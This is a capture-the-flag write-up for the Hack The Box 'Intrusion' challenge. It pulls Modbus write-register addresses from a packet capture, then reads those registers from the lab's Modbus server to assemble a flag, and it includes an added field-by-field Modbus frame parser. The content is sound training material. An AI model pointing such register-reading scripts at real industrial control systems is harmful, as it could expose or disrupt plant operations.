HackTheBox Intrusion Writeup

Explore the basics of cybersecurity in the Intrusion Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/525

Description

After gaining access to the enemy’s infrastructure, we collected crucial network traffic data from their Modbus network. Our primary objective is to swiftly identify the specific registers containing highly sensitive information and extract that data.

Exploitation

network_logs.pcapng is parsed for the register addresses the attacker wrote to, and those registers are then read back from the live Modbus server, with the following script:

#!/usr/bin/python3
import socket
import sys
from time import sleep
from umodbus import conf
from umodbus.client import tcp
from scapy.all import rdpcap, TCP

# Register values are decoded as signed 16-bit integers by umodbus
conf.SIGNED_VALUES = True

if len(sys.argv) != 2:
    print(f"Usage: {sys.argv[0]} <ip:port>")
    sys.exit(1)
try:
    ip, port = sys.argv[1].split(":")
    port = int(port)
except ValueError:
    print("Error: Invalid format for IP and port. Use <ip:port> format.")
    sys.exit(1)

PCAP_FILE = "network_logs.pcapng"

def extract_modbus_commands_and_registers(pcap_file):
    """Collect the Modbus/TCP payloads that reference unit 0x34 and the start
    addresses of the function 0x10 (Write Multiple Registers) requests."""
    packets = rdpcap(pcap_file)
    modbus_commands = []
    register_addresses = []
    for pkt in packets:
        if TCP in pkt:
            payload = bytes(pkt[TCP].payload).hex()
            # Crude filter: the unit identifier 0x34 sits in the MBAP header
            if "34" in payload:
                modbus_commands.append(payload)
                # Expect a 12-byte frame: 7-byte MBAP header + function + address + quantity
                if len(payload) >= len("91ed00000006341000060001"):
                    # Last 5 bytes: function code, 16-bit start address, 16-bit quantity
                    packet = payload[-10:]
                    if packet.startswith("10"):
                        # Take the full big-endian 16-bit start address (hex chars 2..5),
                        # not just its low byte
                        register_addr = int(packet[2:6], 16)
                        register_addresses.append(register_addr)
    return modbus_commands, register_addresses

def main():
    print("[*] Parsing Modbus commands and register addresses from the PCAP file...")
    modbus_commands, register_addresses = extract_modbus_commands_and_registers(PCAP_FILE)
    print("[*] Extracted Modbus Commands:")
    for cmd in modbus_commands:
        print(cmd)
    print("\n[*] Register Addresses:")
    print(register_addresses)
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((ip, port))
        print(f"Connected to Modbus server at {ip}:{port}")
    except Exception as e:
        print(f"Failed to connect to {ip}:{port} - {e}")
        sys.exit(1)
    flag = ""
    try:
        # Read each recovered register (unit id 52 = 0x34) and treat its value as one character
        for address in register_addresses:
            command = tcp.read_holding_registers(52, address, 1)
            response = tcp.send_message(command, sock)
            if isinstance(response, list) and response:
                value = response[0]
                flag += chr(value)
                print(f"Register {address}: {value} -> {chr(value)}")
            else:
                print(f"Failed to read register {address}: {response}")
            sleep(0.1)
    except Exception as e:
        print(f"Error during Modbus communication: {e}")
    finally:
        sock.close()
        print("Connection closed.")
    print(f"Retrieved flag: {flag}")

if __name__ == "__main__":
    main()
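The script above locates the register address by slicing hex strings. Decoding the Modbus/TCP frame field by field is more robust; the following is an added example (not the writeup's own code) that parses the MBAP header and the function/address/quantity PDU of the frame quoted in the script, and also handles a 16-bit start address. The second sample frame is constructed for the example.

```python
# Added example (not the writeup's own code): decode a Modbus/TCP request
# frame field by field. The first sample frame is the one quoted in the
# writeup's script; the second is constructed to show a 16-bit address.
import struct
from dataclasses import dataclass

@dataclass
class ModbusRequest:
    transaction_id: int
    protocol_id: int
    length: int
    unit_id: int
    function: int
    address: int
    quantity: int

def parse_modbus_tcp(frame: bytes) -> ModbusRequest:
    """Parse the 7-byte MBAP header and a 5-byte function/address/count PDU."""
    if len(frame) < 12:
        raise ValueError(f"frame too short for MBAP + PDU: {len(frame)} bytes")
    # MBAP header: transaction id, protocol id (0 for Modbus), length, unit id
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError(f"not Modbus/TCP: protocol id {pid}")
    # Length counts everything after the length field itself (unit id + PDU)
    if length != len(frame) - 6:
        raise ValueError(f"MBAP length {length} does not match frame size")
    # PDU: function code, 16-bit start address, 16-bit quantity (big-endian)
    func, addr, qty = struct.unpack(">BHH", frame[7:12])
    return ModbusRequest(tid, pid, length, unit, func, addr, qty)

def registers_from_hex_frames(hex_frames):
    """Return (unit_id, address) for each well-formed holding-register request."""
    targets = []
    for hx in hex_frames:
        try:
            req = parse_modbus_tcp(bytes.fromhex(hx))
        except ValueError:
            continue  # not a well-formed Modbus request; skip it
        if req.function in (0x03, 0x06, 0x10):  # read / write single / write multiple
            targets.append((req.unit_id, req.address))
    return targets

# Constructed sample input: the frame from the writeup, then one with address 0x010a
SAMPLE_FRAMES = ["91ed00000006341000060001", "91ee000000063410010a0001"]

if __name__ == "__main__":
    for hx in SAMPLE_FRAMES:
        r = parse_modbus_tcp(bytes.fromhex(hx))
        print(f"unit={r.unit_id} func=0x{r.function:02x} addr={r.address} qty={r.quantity}")
```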

Summary

The Intrusion Challenge at Hack The Box introduces participants to the fundamentals of hardware and network protocol security through the analysis of Modbus network traffic. This easy-level challenge emphasizes parsing, interaction with a Modbus server, and retrieving sensitive information stored in registers. By focusing on real-world applications of the Modbus protocol, the challenge delivers a practical learning experience, blending hardware-level insights with Python scripting to interact with industrial systems. It’s an excellent entry point for beginners to explore hardware security and network traffic analysis in a hands-on and engaging way.

This post is licensed under CC BY 4.0 by the author.